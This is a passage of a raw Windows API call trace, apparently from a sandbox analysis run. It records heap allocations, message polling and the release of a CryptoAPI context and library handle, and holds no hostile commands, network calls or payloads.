1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0238.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.607] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0238.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0238.608] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0238.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.608] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0238.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.609] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0238.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0238.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0238.610] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0238.610] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0238.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0238.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0238.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0238.613] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.613] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0238.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0238.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0238.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0238.616] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0238.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0238.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0238.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0238.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.617] FreeLibrary (hLibModule=0x756e0000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0238.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0238.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0238.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0238.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0238.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0238.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0238.618] CloseHandle (hObject=0x2a0) returned 1 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0238.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0238.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0238.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0238.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0238.622] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.622] RtlAllocateHeap 